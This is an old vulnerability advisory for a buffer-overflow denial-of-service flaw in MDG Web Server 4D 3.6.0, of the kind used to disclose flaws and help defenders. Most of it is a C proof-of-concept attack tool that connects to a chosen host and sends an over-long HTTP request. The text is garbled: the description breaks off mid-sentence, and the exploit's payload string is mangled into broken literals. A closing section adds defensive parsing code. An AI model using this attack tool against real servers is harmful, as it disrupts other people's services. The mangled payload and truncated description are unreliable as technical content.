Denial of Service (DoS) in MDG Web Server 4D Version 3.6.0

Reported April 30, 2003, by Tom Ferris.

 

 

VERSIONS AFFECTED

 

  • MDG Web Server 4D 3.6.0

 

DESCRIPTION

 

A Denial of Service (DoS) vulnerability in MDG Web Server 4D 3.6.0 can result in the execution of arbitrary code on the vulnerable system. This vulnerability stems from a buffer-overflow condition. By issuing a GET / request with 4096 caret brackets (

 

 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

/* Web Server 4D 3.6.0 DoS
 *
 * Vulnerable systems:
 * Web Server 4D 3.6.0 DoS
 * Vendor:
 * http://www.mdg.com/
 *
 * Download it here:
 * ftp://ftp.mdg.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe
 *
 * Written and found by badpack3t
 * For SP Research Labs
 * 04/29/2003
 *
 * www.security-protocols.com
 *
 * usage:
 * sp-ws4d [targetport] (default is 80)
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] =

 

"GET /

"

"

"

"

"

"

 

 

int main(int argc, char *argv[])
{
      WSADATA wsaData;
      WORD wVersionRequested;
      struct hostent          *pTarget;
      struct sockaddr_in      sock;
      char *target, buffer[30000];
      int port,bufsize;
      SOCKET mysocket;

      /* A target host is required as the first argument. */
      if (argc < 2)
      {
            printf("Web Server 4D 3.6.0 DoS\r\n \r\n\r\n", argv[0]);
            printf("Tool Usage:\r\n %s [targetport] (default is 80)\r\n\r\n", argv[0]);
            printf("www.security-protocols.com\r\n\r\n", argv[0]);
            exit(1);
      }

      /* Initialise Winsock 1.1. */
      wVersionRequested = MAKEWORD(1, 1);
      if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

      target = argv[1];

      //for default web attacks
      port = 80;

      if (argc >= 3) port = atoi(argv[2]);
      bufsize = 512;
      if (argc >= 4) bufsize = atoi(argv[3]);

      mysocket = socket(AF_INET, SOCK_STREAM, 0);
      if(mysocket == INVALID_SOCKET)
      {
            printf("Socket error!\r\n");
            exit(1);
      }

      printf("Resolving Hostnames...\n");
      if ((pTarget = gethostbyname(target)) == NULL)
      {
            printf("Resolve of %s failed\n", argv[1]);
            exit(1);
      }

      memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
      sock.sin_family = AF_INET;
      sock.sin_port = htons((USHORT)port);

      printf("Connecting...\n");
      if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
      {
            printf("Couldn't connect to host.\n");
            exit(1);
      }

      printf("Connected!...\n");
      printf("Sending Payload...\n");
      /* Send the request held in exploit[], without its terminating NUL. */
      if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
      {
            printf("Error Sending the Exploit Payload\r\n");
            closesocket(mysocket);
            exit(1);
      }

      printf("Remote Webserver has been DoS'ed \r\n");
      closesocket(mysocket);
      WSACleanup();
      return 0;
}

 

VENDOR RESPONSE

 

MDG has released version 3.6.1 of the product. The vendor reports that this version is no longer vulnerable.
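
The advisory does not describe how the vendor fixed the flaw. As an added illustration (not MDG's code and not part of the original advisory), the C code below shows the kind of bounded request-line handling that prevents this class of overflow: an over-long GET line is rejected instead of being copied into a fixed buffer. The function name parse_request_line, the 2048-byte limit and the result codes are assumptions made for the example, and the test request is constructed.

```c
#include <stdio.h>
#include <string.h>
#define MAX_REQUEST_LINE 2048 /* assumed limit for this example */
/* Hypothetical result codes: 0 = need more data, otherwise an HTTP status. */
enum { REQ_NEED_MORE = 0, REQ_OK = 200, REQ_BAD = 400, REQ_TOO_LONG = 414 };

/* Copy the target of "GET <target> [HTTP/x.y]\r\n" out of an untrusted,
 * not NUL-terminated receive buffer without ever writing past out_cap. */
int parse_request_line(const char *in, size_t in_len, char *out, size_t out_cap)
{
    size_t window = in_len < MAX_REQUEST_LINE ? in_len : MAX_REQUEST_LINE;
    const char *eol, *start, *end;
    size_t target_len;

    if (out_cap == 0) return REQ_BAD;
    out[0] = '\0';
    eol = memchr(in, '\n', window);   /* search the bounded window only */
    if (eol == NULL)
        return in_len >= MAX_REQUEST_LINE ? REQ_TOO_LONG : REQ_NEED_MORE;
    if (in_len < 4 || memcmp(in, "GET ", 4) != 0) return REQ_BAD;
    start = in + 4;
    end = memchr(start, ' ', (size_t)(eol - start));
    if (end == NULL) {                /* no version token on the line */
        end = eol;
        if (end > start && end[-1] == '\r') end--;
    }
    target_len = (size_t)(end - start);
    if (target_len == 0) return REQ_BAD;
    if (target_len >= out_cap) return REQ_TOO_LONG; /* reject, do not copy */
    memcpy(out, start, target_len);
    out[target_len] = '\0';
    return REQ_OK;
}

/* Constructed input: "GET /" followed by 4096 filler bytes and CRLF. */
int demo_overlong(void)
{
    static char req[5 + 4096 + 2];
    char target[256];
    memcpy(req, "GET /", 5);
    memset(req + 5, 'A', 4096);
    memcpy(req + 5 + 4096, "\r\n", 2);
    return parse_request_line(req, sizeof req, target, sizeof target);
}

int main(void)
{
    printf("overlong request -> %d\n", demo_overlong());
    return 0;
}
```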

 

CREDIT

 

Discovered by Tom Ferris.
